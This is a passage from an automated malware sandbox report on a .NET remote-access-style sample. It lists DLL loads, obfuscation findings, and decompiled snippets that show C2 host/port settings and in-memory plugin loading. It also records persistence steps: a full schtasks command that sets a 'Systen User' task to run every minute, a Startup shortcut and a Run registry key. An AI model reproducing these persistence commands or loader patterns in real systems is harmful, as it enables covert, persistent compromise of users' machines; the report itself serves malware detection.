Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Systen User	Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: pdh.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.appdefaults.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: duser.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: uianimation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Systen User.lnk.2.dr

LNK file: ..\..\..\..\..\Systen User

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ozgpPwVAu1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ozgpPwVAu1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Systen User.2.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Systen User.2.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Systen User.2.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: adawsfaefasfasfg.exe.0.dr, Messages.cs	.Net Code: Memory
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: wasdwasfwasfs.exe.0.dr, Messages.cs	.Net Code: Memory
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: Systen User.2.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: Systen User.2.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: Systen User.2.dr, Messages.cs	.Net Code: Memory

Source: C:\Users\user\adawsfaefasfasfg.exe	Code function: 2_2_00007FF887D28F92 pushad ; ret	2_2_00007FF887D28F93
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF887C2D2A5 pushad ; iretd	8_2_00007FF887C2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF887D41074 push E85DD1FBh; ret	8_2_00007FF887D410F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF887D410FA push E85DD1FBh; ret	8_2_00007FF887D410F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF887E12316 push 8B485F92h; iretd	8_2_00007FF887E1231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF887C2D2A5 pushad ; iretd	9_2_00007FF887C2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF887D41084 push E85DD1FBh; ret	9_2_00007FF887D410F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF887D410FA push E85DD1FBh; ret	9_2_00007FF887D410F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF887E12316 push 8B485F92h; iretd	9_2_00007FF887E1231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF887C3D2A5 pushad ; iretd	14_2_00007FF887C3D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF887E22316 push 8B485F91h; iretd	14_2_00007FF887E2231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF887C2D2A5 pushad ; iretd	16_2_00007FF887C2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF887E12316 push 8B485F92h; iretd	16_2_00007FF887E1231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF887C1D2A5 pushad ; iretd	18_2_00007FF887C1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF887E02316 push 8B485F93h; iretd	18_2_00007FF887E0231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF887C0D2A5 pushad ; iretd	22_2_00007FF887C0D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_00007FF887DF2316 push 8B485F94h; iretd	22_2_00007FF887DF231B

Source: ozgpPwVAu1.exe

Static PE information: section name: .text entropy: 7.927667118084018

Source: ozgpPwVAu1.exe, TGZL3mfzzUkOgkHp4g0oyQycwm9mvPij2rxscxy.cs	High entropy of concatenated method names: 'T7Q9uwQ9RPXPf1Z5MM1b6XWnzNpT365mK76lUP7', 'UUZWvCID2xTaCbyiGNTon60A4vU7PTuJMu6QpcD', 'd0nEAb3qZ0cEWXyKBqSLoajQZIwZQ6tz8dvCPWh', 'sWIEVe8IjeQ2HZogn2FE2Cuw5APKLeXdsVq3QoM', 'kAQi1DKS9OLtWCsX7tc7xBUywuEKYbtMjeMz0AY', 'GTloUD7hg51OcnpwG9qqdJ4pkPc1bm3yv1wFOYO', 'Gxw9ACkEwwnCZ2LtpYeMTivyL2UTNJLJ6h5K1Iy', 'Bhbpgj5CBoHmkztnve0OeBeiQxL0yYwXFUDX4Jg', 'AzTm9IvkO7nL49Ooben12Kap4Gx5eMA1CwLilAH', 'IpyUSQTWk3b5EBW1sh2JIXilgnsfqXKJy9gNigd'
Source: ozgpPwVAu1.exe, z1OjIvydKGTbalIbYUPcRhi4bOJnRDCAVbUUKYPYD7f49P4ISkbGWdsUqyU2K68zfFPki2ANQvumEvxRMdQvn9SsNNuBub4JA.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_94ZtCFzd0KPbNFkIvRAENYsrVrg533MaRyQqYNB', '_53dEKXjckdCMBFXrjZOyYI4RP05OvfMGhgXIEDm', 'eV5uZbZuL3mtLX6nU9yyohXP3vRNeCf1m6eoLDi', 'NosivGeTY9BA8jUna1w4taRYltRDpSSRqNK1rp8'

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\wasdwasfwasfs.exe	Jump to dropped file
Source: C:\Users\user\adawsfaefasfasfg.exe	File created: C:\Users\user\AppData\Roaming\Systen User	Jump to dropped file
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\adawsfaefasfasfg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\wasdwasfwasfs.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\adawsfaefasfasfg.exe			Jump to dropped file

Source: C:\Users\user\adawsfaefasfasfg.exe

File created: C:\Users\user\AppData\Roaming\Systen User

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\wasdwasfwasfs.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	File created: C:\Users\user\adawsfaefasfasfg.exe			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\adawsfaefasfasfg.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"

Source: C:\Users\user\adawsfaefasfasfg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk

Jump to behavior

Source: C:\Users\user\adawsfaefasfasfg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk

Jump to behavior

Source: C:\Users\user\adawsfaefasfasfg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Systen User			Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Systen User			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
